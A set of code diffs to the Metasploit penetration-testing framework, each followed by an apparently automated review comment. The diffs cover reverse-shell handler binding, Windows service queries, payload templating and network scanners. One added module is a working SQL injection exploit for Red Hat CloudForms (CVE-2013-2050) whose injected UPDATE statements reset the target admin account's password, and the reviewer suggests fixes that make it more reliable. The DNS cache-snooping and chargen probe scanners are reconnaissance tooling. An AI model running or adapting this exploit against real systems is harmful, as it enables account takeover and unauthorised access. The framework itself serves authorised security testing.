self.listener_sock = Rex::Socket::SslTcpServer.create(
|
self.listener_sock = Rex::Socket::SslTcpServer.create(
|
||||||
'LocalHost' => datastore['LHOST'],
|
'LocalHost' => ip,
|
||||||
'LocalPort' => datastore['LPORT'].to_i,
|
'LocalPort' => local_port,
|
||||||
'Comm' => comm,
|
'Comm' => comm,
|
||||||
'SSLCert' => datastore['SSLCert'],
|
'SSLCert' => datastore['SSLCert'],
|
||||||
'Context' =>
|
'Context' =>
|
||||||
|
@ -108,16 +99,43 @@ module ReverseTcpSsl
|
||||||
via = ""
|
via = ""
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}")
|
print_status("Started reverse SSL handler on #{ip}:#{local_port} #{via}")
|
||||||
break
|
break
|
||||||
rescue
|
rescue
|
||||||
ex = $!
|
ex = $!
|
||||||
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
|
print_error("Handler failed to bind to #{ip}:#{local_port}")
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
raise ex if (ex)
|
raise ex if (ex)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
protected
|
||||||
|
|
||||||
|
def bind_port
|
||||||
|
port = datastore['ReverseListenerBindPort'].to_i
|
||||||
|
port > 0 ? port : datastore['LPORT'].to_i
|
||||||
|
end
|
||||||
|
|
||||||
|
def bind_address
|
||||||
|
# Switch to IPv6 ANY address if the LHOST is also IPv6
|
||||||
|
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
|
||||||
|
# First attempt to bind LHOST. If that fails, the user probably has
|
||||||
|
# something else listening on that interface. Try again with ANY_ADDR.
|
||||||
|
any = (addr.length == 4) ? "0.0.0.0" : "::0"
|
||||||
|
|
||||||
|
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
|
||||||
|
|
||||||
|
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
||||||
|
# Only try to bind to this specific interface
|
||||||
|
addrs = [ datastore['ReverseListenerBindAddress'] ]
|
||||||
|
|
||||||
|
# Pick the right "any" address if either wildcard is used
|
||||||
|
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
|
||||||
|
end
|
||||||
|
|
||||||
|
addrs
|
||||||
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
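Review bot: `bind_port` and `bind_address` are now three byte-identical copies across ReverseTcp, ReverseTcpSsl and ReverseHttp, each handler also registering the same two options, and the `addrs == "::0"` array-to-string comparison is replicated in all three — the usual fate of copy-pasted helpers. Factor them into one mixin under `Msf::Handler` that registers `ReverseListenerBindAddress`/`ReverseListenerBindPort` and provides both methods, then include it from the three handlers. The SSL variant also replaces `'LocalHost' => datastore['LHOST']` with `ip`, which is what makes the bind-fallback loop meaningful; that change alters which interface the SSL listener lands on when LHOST fails to bind and deserves a line in the commit message.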
@ -449,6 +449,9 @@ class Module
|
||||||
ch = self.compat['Nop']
|
ch = self.compat['Nop']
|
||||||
elsif (mod.type == MODULE_PAYLOAD)
|
elsif (mod.type == MODULE_PAYLOAD)
|
||||||
ch = self.compat['Payload']
|
ch = self.compat['Payload']
|
||||||
|
if self.respond_to?("target") and self.target['Payload'] and self.target['Payload']['Compat']
|
||||||
|
ch = ch.merge(self.target['Payload']['Compat'])
|
||||||
|
end
|
||||||
else
|
else
|
||||||
return true
|
return true
|
||||||
end
|
end
|
||||||
|
|
|
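Review bot: `self.target['Payload']['Compat']` is dereferenced as soon as `respond_to?("target")` holds, so if `target` can return nil (no target resolved) the compatibility check raises NoMethodError instead of falling back to the module-wide `compat['Payload']`; guard the value as well: `if self.respond_to?("target") and self.target and self.target['Payload'] and self.target['Payload']['Compat']`. `merge` returns a new hash so `self.compat` is not mutated, which is worth a one-line comment (`# merge returns a copy; the module-wide compat table is left untouched`) because `ch` otherwise reads as a reference into `self.compat`. The enclosing method starts and ends outside this hunk.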
@ -1,5 +1,6 @@
|
||||||
|
|
||||||
module Msf::Post::Windows
|
module Msf::Post::Windows
|
||||||
|
require 'msf/core/post/windows/error'
|
||||||
require 'msf/core/post/windows/accounts'
|
require 'msf/core/post/windows/accounts'
|
||||||
require 'msf/core/post/windows/cli_parse'
|
require 'msf/core/post/windows/cli_parse'
|
||||||
require 'msf/core/post/windows/eventlog'
|
require 'msf/core/post/windows/eventlog'
|
||||||
|
|
|
@ -306,6 +306,50 @@ module Services
|
||||||
handle["GetLastError"]
|
handle["GetLastError"]
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Query Service Status
|
||||||
|
#
|
||||||
|
# @param (see #service_start)
|
||||||
|
#
|
||||||
|
# @return {} representing lpServiceStatus
|
||||||
|
#
|
||||||
|
# @raise (see #service_start)
|
||||||
|
#
|
||||||
|
#
|
||||||
|
def service_status(name, server=nil)
|
||||||
|
adv = session.railgun.advapi32
|
||||||
|
ret = nil
|
||||||
|
|
||||||
|
# 0x80000000 GENERIC_READ
|
||||||
|
open_sc_manager(:host => server, :access => 0x80000000) do |manager|
|
||||||
|
# Now to grab a handle to the service.
|
||||||
|
handle = adv.OpenServiceA(manager, name, 0x80000000)
|
||||||
|
if (handle["return"] == 0)
|
||||||
|
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
|
||||||
|
end
|
||||||
|
|
||||||
|
status = adv.QueryServiceStatus(handle["return"],28)
|
||||||
|
if (status["return"] == 0)
|
||||||
|
raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{handle["GetLastError"]}")
|
||||||
|
end
|
||||||
|
|
||||||
|
vals = status['lpServiceStatus'].unpack('L*')
|
||||||
|
adv.CloseServiceHandle(handle["return"])
|
||||||
|
|
||||||
|
ret = {
|
||||||
|
:type => vals[0],
|
||||||
|
:state => vals[1],
|
||||||
|
:controls_accepted => vals[2],
|
||||||
|
:win32_exit_code => vals[3],
|
||||||
|
:service_exit_code => vals[4],
|
||||||
|
:check_point => vals[5],
|
||||||
|
:wait_hint => vals[6]
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
|
return ret
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
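Review bot: When `QueryServiceStatus` fails, the raised message reports `handle["GetLastError"]` — the error code of the earlier successful `OpenServiceA` call — instead of `status["GetLastError"]`, so the operator sees a misleading code, and that same raise skips `adv.CloseServiceHandle`, leaking the service handle in the remote process. Wrap the query in `begin`/`ensure` so the handle is always released and report the right error. Least privilege would also argue for opening the service with `SERVICE_QUERY_STATUS` (0x0004) rather than `GENERIC_READ` since only the status is read, though that is a policy choice rather than a defect.
```ruby
handle = adv.OpenServiceA(manager, name, 0x80000000)
if (handle["return"] == 0)
  raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
end

begin
  status = adv.QueryServiceStatus(handle["return"], 28)
  if (status["return"] == 0)
    raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{status["GetLastError"]}")
  end
  vals = status['lpServiceStatus'].unpack('L*')
ensure
  adv.CloseServiceHandle(handle["return"])
end
# … unchanged: build the ret hash from vals …
```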
@ -1040,6 +1040,7 @@ def self.to_vba(framework,code,opts={})
|
||||||
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
|
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
|
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
|
||||||
# Specify the payload in hex as an extra file..
|
# Specify the payload in hex as an extra file..
|
||||||
payload_hex = exe.unpack('H*')[0]
|
payload_hex = exe.unpack('H*')[0]
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
# -*- coding: binary -*-
|
# -*- coding: binary -*-
|
||||||
|
require 'metasm'
|
||||||
|
|
||||||
module Rex
|
module Rex
|
||||||
module ElfScan
|
module ElfScan
|
||||||
|
@ -27,6 +28,26 @@ class Generic
|
||||||
rva = hit[0]
|
rva = hit[0]
|
||||||
message = hit[1].is_a?(Array) ? hit[1].join(" ") : hit[1]
|
message = hit[1].is_a?(Array) ? hit[1].join(" ") : hit[1]
|
||||||
$stdout.puts elf.ptr_s(rva) + " " + message
|
$stdout.puts elf.ptr_s(rva) + " " + message
|
||||||
|
if(param['disasm'])
|
||||||
|
message.gsub!("; ", "\n")
|
||||||
|
if message.include?("retn")
|
||||||
|
message.gsub!("retn", "ret")
|
||||||
|
end
|
||||||
|
|
||||||
|
begin
|
||||||
|
d2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, message).disassemble
|
||||||
|
rescue Metasm::ParseError
|
||||||
|
d2 = Metasm::Shellcode.disassemble(Metasm::Ia32.new, [message].pack('H*'))
|
||||||
|
end
|
||||||
|
|
||||||
|
addr = 0
|
||||||
|
while ((di = d2.disassemble_instruction(addr)))
|
||||||
|
disasm = "0x%08x\t" % (rva + addr)
|
||||||
|
disasm << di.instruction.to_s
|
||||||
|
$stdout.puts disasm
|
||||||
|
addr = di.next_addr
|
||||||
|
end
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
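Review bot: Both disassembly paths hard-wire `Metasm::Ia32.new`, so a hit taken from a 64-bit ELF will be decoded as 32-bit code and the printed instructions will be wrong; if `elf` exposes its machine type, derive the Metasm CPU from it instead of assuming IA-32. The `rescue Metasm::ParseError` fallback packs `message` with `'H*'`, but by then `message` is mnemonic text with `; ` already turned into newlines, so `pack('H*')` produces garbage bytes rather than an error — guard it with something like `raise unless message =~ /\A\h+\z/` or document which hit formats are expected to arrive as hex. `message.gsub!` also mutates `hit[1]` in place when it is a String, which a caller that keeps `hits` around may not expect; `message = message.gsub(...)` avoids that. The enclosing method begins before this hunk.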
|
||||||
|
|
||||||
|
@ -203,4 +224,3 @@ end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -27,6 +27,10 @@ class Def_advapi32
|
||||||
def self.create_dll(dll_path = 'advapi32')
|
def self.create_dll(dll_path = 'advapi32')
|
||||||
dll = DLL.new(dll_path, ApiConstants.manager)
|
dll = DLL.new(dll_path, ApiConstants.manager)
|
||||||
|
|
||||||
|
dll.add_function('QueryServiceStatus', 'DWORD', [
|
||||||
|
['LPVOID', 'hService', 'in'],
|
||||||
|
['PBLOB', 'lpServiceStatus', 'out']])
|
||||||
|
|
||||||
dll.add_function('CredEnumerateA', 'BOOL', [
|
dll.add_function('CredEnumerateA', 'BOOL', [
|
||||||
['PCHAR', 'Filter', 'in'],
|
['PCHAR', 'Filter', 'in'],
|
||||||
['DWORD', 'Flags', 'in'],
|
['DWORD', 'Flags', 'in'],
|
||||||
|
@ -2089,10 +2093,8 @@ class Def_advapi32
|
||||||
["PBLOB","pvContext","in"],
|
["PBLOB","pvContext","in"],
|
||||||
])
|
])
|
||||||
|
|
||||||
|
|
||||||
return dll
|
return dll
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end; end; end; end; end; end; end
|
end; end; end; end; end; end; end
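Review bot: The new `QueryServiceStatus` definition gives no hint about how large the `lpServiceStatus` out-buffer must be, yet the caller has to size it: SERVICE_STATUS is seven DWORDs, 28 bytes, and a smaller value returns a truncated blob that `unpack('L*')` will silently mis-split. I'd add `# lpServiceStatus receives a SERVICE_STATUS (7 DWORDs = 28 bytes); pass that size as the buffer argument` above the `add_function` call so the next caller does not have to rediscover it.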
|
||||||
|
|
|
@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
</SOAP-ENV:Body>
|
</SOAP-ENV:Body>
|
||||||
</SOAP-ENV:Envelope>|
|
</SOAP-ENV:Envelope>|
|
||||||
|
|
||||||
template = template.gsub(/^\t\t/, '')
|
template = template.gsub(/^ {4}/, '')
|
||||||
template = template.gsub(/\n/, '')
|
template = template.gsub(/\n/, '')
|
||||||
|
|
||||||
connect
|
connect
|
||||||
|
|
|
@ -0,0 +1,175 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'bcrypt'
|
||||||
|
require 'digest'
|
||||||
|
require 'openssl'
|
||||||
|
|
||||||
|
class Metasploit4 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a SQL injection vulnerability in the "explorer"
|
||||||
|
action of "miq_policy" controller of the Red Hat CloudForms Management
|
||||||
|
Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by
|
||||||
|
changing the password of the target account to the specified password.
|
||||||
|
},
|
||||||
|
'Author' => 'Ramon de C Valle',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['CVE', '2013-2050'],
|
||||||
|
['CWE', '89'],
|
||||||
|
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=959062']
|
||||||
|
],
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'SSL' => true
|
||||||
|
},
|
||||||
|
'DisclosureDate' => 'Nov 12 2013'
|
||||||
|
)
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(443),
|
||||||
|
OptString.new('USERNAME', [true, 'Your username']),
|
||||||
|
OptString.new('PASSWORD', [true, 'Your password']),
|
||||||
|
OptString.new('TARGETUSERNAME', [true, 'The username of the target account', 'admin']),
|
||||||
|
OptString.new('TARGETPASSWORD', [true, 'The password of the target account', 'smartvm']),
|
||||||
|
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
|
||||||
|
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ])
|
||||||
|
], self.class
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
def password_for_newer_schema
|
||||||
|
# Newer versions use ActiveModel's SecurePassword.
|
||||||
|
BCrypt::Password.create(datastore['TARGETPASSWORD'])
|
||||||
|
end
|
||||||
|
|
||||||
|
def password_for_older_schema
|
||||||
|
# Older versions use ManageIQ's MiqPassword.
|
||||||
|
if datastore['TARGETPASSWORD'].empty?
|
||||||
|
'v1:{}'
|
||||||
|
else
|
||||||
|
password = '1234567890123456'
|
||||||
|
salt = '6543210987654321'
|
||||||
|
cipher = OpenSSL::Cipher.new('AES-256-CBC')
|
||||||
|
cipher.encrypt
|
||||||
|
cipher.key = Digest::SHA256.digest("#{salt}#{password}")[0...32]
|
||||||
|
encrypted = cipher.update(datastore['TARGETPASSWORD']) + cipher.final
|
||||||
|
"v1:{#{Rex::Text.encode_base64(encrypted)}}"
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def password_reset?
|
||||||
|
print_status("Trying to log into #{target_url('dashboard')} using the target account...")
|
||||||
|
res = send_request_cgi(
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'),
|
||||||
|
'vars_post' => {
|
||||||
|
'user_name' => datastore['TARGETUSERNAME'],
|
||||||
|
'user_password' => datastore['TARGETPASSWORD']
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
if res.nil?
|
||||||
|
print_error('No response from remote host')
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.body =~ /"Error: (.*)"/
|
||||||
|
print_error($1)
|
||||||
|
false
|
||||||
|
else
|
||||||
|
true
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
print_status("Logging into #{target_url('dashboard')}...")
|
||||||
|
res = send_request_cgi(
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'),
|
||||||
|
'vars_post' => {
|
||||||
|
'user_name' => datastore['USERNAME'],
|
||||||
|
'user_password' => datastore['PASSWORD']
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
if res.nil?
|
||||||
|
print_error('No response from remote host')
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.body =~ /"Error: (.*)"/
|
||||||
|
print_error($1)
|
||||||
|
return
|
||||||
|
else
|
||||||
|
session = $1 if res.headers['Set-Cookie'] =~ /_vmdb_session=(\h*)/
|
||||||
|
|
||||||
|
if session.nil?
|
||||||
|
print_error('Failed to retrieve the current session id')
|
||||||
|
return
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# Newer versions don't accept POST requests.
|
||||||
|
print_status("Sending password-reset request to #{target_url('miq_policy', 'explorer')}...")
|
||||||
|
send_request_cgi(
|
||||||
|
'cookie' => "_vmdb_session=#{session}",
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'),
|
||||||
|
'vars_get' => {
|
||||||
|
'profile[]' => value_for_newer_schema
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
if password_reset?
|
||||||
|
print_good('Password reset successfully')
|
||||||
|
return
|
||||||
|
else
|
||||||
|
print_error('Failed to reset password')
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("Sending (older-schema) password-reset request to #{target_url('miq_policy', 'explorer')}...")
|
||||||
|
send_request_cgi(
|
||||||
|
'cookie' => "_vmdb_session=#{session}",
|
||||||
|
'method' => datastore['HTTP_METHOD'],
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'),
|
||||||
|
"vars_#{datastore['HTTP_METHOD'].downcase}" => {
|
||||||
|
'profile[]' => value_for_older_schema
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
if password_reset?
|
||||||
|
print_good('Password reset successfully')
|
||||||
|
else
|
||||||
|
print_error('Failed to reset password')
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def target_url(*args)
|
||||||
|
(ssl ? 'https' : 'http') +
|
||||||
|
if rport.to_i == 80 || rport.to_i == 443
|
||||||
|
"://#{vhost}"
|
||||||
|
else
|
||||||
|
"://#{vhost}:#{rport}"
|
||||||
|
end + normalize_uri(target_uri.path, *args)
|
||||||
|
end
|
||||||
|
|
||||||
|
def value_for_newer_schema
|
||||||
|
"1 = 1); UPDATE users SET password_digest = '#{password_for_newer_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --"
|
||||||
|
end
|
||||||
|
|
||||||
|
def value_for_older_schema
|
||||||
|
"1 = 1); UPDATE users SET password = '#{password_for_older_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --"
|
||||||
|
end
|
||||||
|
end
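Review bot: The session-cookie capture `/_vmdb_session=(\h*)/` also matches zero hex digits, so an unexpected cookie value yields `session = ""` and the `session.nil?` guard below it never fires; use `(\h+)` so a missing id is actually detected. `TARGETUSERNAME` is interpolated into both injected UPDATE statements unescaped, so a username containing `'` breaks the statement — double the quotes first, e.g. `datastore['TARGETUSERNAME'].gsub("'", "''")`, in `value_for_newer_schema` and `value_for_older_schema`. The module is destructive (it overwrites the target account's password) and the response to the first reset request is discarded without a nil check; a `print_warning` stating that up front and a guard on that response would make failures easier to diagnose.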
|
|
@ -77,6 +77,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
|
if ports.empty?
|
||||||
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
|
end
|
||||||
|
|
||||||
ports.each_with_index do |port,i|
|
ports.each_with_index do |port,i|
|
||||||
p.tcp_dst = port
|
p.tcp_dst = port
|
||||||
p.tcp_src = rand(64511)+1024
|
p.tcp_src = rand(64511)+1024
|
||||||
|
|
|
@ -0,0 +1,116 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'net/dns/resolver'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'DNS Non-Recursive Record Scraper',
|
||||||
|
'Description' => %q{
|
||||||
|
This module can be used to scrape records that have been cached
|
||||||
|
by a specific nameserver. The module allows the user to test
|
||||||
|
every record from a specified file.
|
||||||
|
},
|
||||||
|
'Author' => [
|
||||||
|
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>',
|
||||||
|
'Rob Dixon "304geek" <rob.dixon[at]accuvant.com>'
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' => [
|
||||||
|
['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'],
|
||||||
|
['URL', 'http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf']
|
||||||
|
]))
|
||||||
|
|
||||||
|
register_options([
|
||||||
|
OptString.new('DOMAIN', [ false, "Domain name to query for"]),
|
||||||
|
OptPath.new('WORDLIST', [ false, "Wordlist for domain name queries", ::File.join(Msf::Config.data_directory, "wordlists", "av-update-urls.txt")]),
|
||||||
|
OptAddress.new('NS', [ true, "Specify the nameserver to use for queries" ]),
|
||||||
|
], self.class)
|
||||||
|
|
||||||
|
register_advanced_options([
|
||||||
|
OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]),
|
||||||
|
OptInt.new('DNS_TIMEOUT', [true, "DNS Timeout in seconds", 5])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
# method to scrape dns
|
||||||
|
def scrape_dns(domain)
|
||||||
|
|
||||||
|
# dns request with recursive disabled
|
||||||
|
use_tcp = datastore['TCP_DNS']
|
||||||
|
res = Net::DNS::Resolver.new(:nameservers => "#{datastore['NS']}", :recursive => false, :use_tcp => use_tcp)
|
||||||
|
use_tcp ? res.tcp_timeout = datastore['DNS_TIMEOUT'] : res.udp_timeout = datastore['DNS_TIMEOUT']
|
||||||
|
|
||||||
|
# query dns
|
||||||
|
begin
|
||||||
|
query = res.send(domain)
|
||||||
|
rescue ResolverArgumentError
|
||||||
|
print_error("Invalid domain: #{domain}")
|
||||||
|
return
|
||||||
|
rescue NoResponseError
|
||||||
|
print_error("DNS Timeout Issue: #{domain}")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
# found or not found
|
||||||
|
if query.answer.empty?
|
||||||
|
vprint_status("#{domain} - Not Found")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
@is_vulnerable = true
|
||||||
|
print_good("#{domain} - Found")
|
||||||
|
report_goods(domain)
|
||||||
|
end
|
||||||
|
|
||||||
|
# method to read each line from file
|
||||||
|
def read_file
|
||||||
|
::File.open("#{datastore['WORDLIST']}", "rb").each_line do |line|
|
||||||
|
scrape_dns(line.chomp)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# log results to database
|
||||||
|
def report_goods(domain)
|
||||||
|
if datastore['TCP_DNS']
|
||||||
|
proto = "tcp"
|
||||||
|
else
|
||||||
|
proto = "udp"
|
||||||
|
end
|
||||||
|
|
||||||
|
report_note(
|
||||||
|
:host => datastore['NS'],
|
||||||
|
:name => "dns",
|
||||||
|
:port => 53,
|
||||||
|
:proto => proto,
|
||||||
|
:type => "dns.cache.scrape",
|
||||||
|
:data => "#{domain} cached",
|
||||||
|
:update => :unique_data
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
# main control method
|
||||||
|
def run
|
||||||
|
@is_vulnerable = false
|
||||||
|
|
||||||
|
print_status("Making queries against #{datastore['NS']}")
|
||||||
|
|
||||||
|
if datastore['DOMAIN'].blank?
|
||||||
|
read_file
|
||||||
|
else
|
||||||
|
scrape_dns(datastore['DOMAIN'])
|
||||||
|
end
|
||||||
|
|
||||||
|
report_vuln(
|
||||||
|
:host => datastore['NS'],
|
||||||
|
:name => "DNS Cache Snooping",
|
||||||
|
) if @is_vulnerable
|
||||||
|
end
|
||||||
|
end
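Review bot: `read_file` opens the wordlist with `::File.open(...).each_line` and never closes it, so the descriptor lives until GC; the block form `::File.foreach(datastore['WORDLIST']) { |line| scrape_dns(line.chomp) }` closes it deterministically. Blank lines in the list become empty-domain queries that surface as `Invalid domain:` errors — add `next if line.strip.empty?` inside the loop. Note also that a non-recursive answer only implies caching when the server is not authoritative for the queried zone; as written `@is_vulnerable` is set on authoritative replies too, so either check the AA flag on `query` or describe the vuln as "records returned without recursion" rather than cache snooping.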
|
||||||
|
|
|
@ -0,0 +1,68 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
include Msf::Exploit::Remote::Udp
|
||||||
|
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'Chargen Probe Utility',
|
||||||
|
'Description' => %q{
|
||||||
|
Chargen is a debugging and measurement tool and a character
|
||||||
|
generator service. A character generator service simply sends
|
||||||
|
data without regard to the input.
|
||||||
|
Chargen is susceptible to spoofing the source of transmissions
|
||||||
|
as well as use in a reflection attack vector. The misuse of the
|
||||||
|
testing features of the Chargen service may allow attackers to
|
||||||
|
craft malicious network payloads and reflect them by spoofing
|
||||||
|
the transmission source to effectively direct it to a target.
|
||||||
|
This can result in traffic loops and service degradation with
|
||||||
|
large amounts of network traffic.
|
||||||
|
},
|
||||||
|
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'CVE', '1999-0103' ], # Note, does not actually trigger a flood.
|
||||||
|
[ 'URL', 'https://www.cert.be/pro/docs/chargensnmp-ddos-attacks-rise' ],
|
||||||
|
[ 'URL', 'http://tools.ietf.org/html/rfc864' ],
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Feb 08 1996')
|
||||||
|
|
||||||
|
register_options([
|
||||||
|
Opt::RPORT(19)
|
||||||
|
])
|
||||||
|
|
||||||
|
deregister_options('RHOST')
|
||||||
|
end
|
||||||
|
|
||||||
|
def run_host(rhost)
|
||||||
|
begin
|
||||||
|
connect_udp
|
||||||
|
pkt = Rex::Text.rand_text_alpha_lower(1)
|
||||||
|
udp_sock.write(pkt)
|
||||||
|
r = udp_sock.recvfrom(65535, 0.1)
|
||||||
|
|
||||||
|
if r and r[1]
|
||||||
|
vprint_status("#{rhost}:#{rport} - Response: #{r[0].to_s}")
|
||||||
|
res = r[0].to_s.strip
|
||||||
|
if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/))
|
||||||
|
print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)")
|
||||||
|
report_service(:host => rhost, :port => rport, :name => "chargen", :info => res.length)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
|
||||||
|
nil
|
||||||
|
ensure
|
||||||
|
disconnect_udp if self.udp_sock
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
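Review bot: The `print_good` message reports `res.length` as "headers + UDP payload", but `res` is `r[0].to_s.strip` — only the application payload with surrounding whitespace removed, no IP or UDP headers — so the message overstates what was measured; `"#{rhost}:#{rport} answers with #{res.length} bytes of payload"` is accurate. `:info => res.length` also stores an Integer where `report_service` expects free text; `:info => "#{res.length} bytes"` reads better in the database. The fixed `0.1` second `recvfrom` timeout is tight for hosts more than a few hops away and will produce silent misses; exposing it as an option is worth considering.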
|
|
@ -46,6 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
@probes << 'probe_pkt_citrix'
|
@probes << 'probe_pkt_citrix'
|
||||||
@probes << 'probe_pkt_pca_st'
|
@probes << 'probe_pkt_pca_st'
|
||||||
@probes << 'probe_pkt_pca_nq'
|
@probes << 'probe_pkt_pca_nq'
|
||||||
|
@probes << 'probe_chargen'
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -204,6 +205,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
case pkt[2]
|
case pkt[2]
|
||||||
|
|
||||||
|
when 19
|
||||||
|
app = 'chargen'
|
||||||
|
return unless chargen_parse(pkt[0])
|
||||||
|
@results[hkey] = true
|
||||||
|
|
||||||
when 53
|
when 53
|
||||||
app = 'DNS'
|
app = 'DNS'
|
||||||
ver = nil
|
ver = nil
|
||||||
|
@ -362,6 +368,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
"#{res[2]}_#{res[1]}"
|
"#{res[2]}_#{res[1]}"
|
||||||
end
|
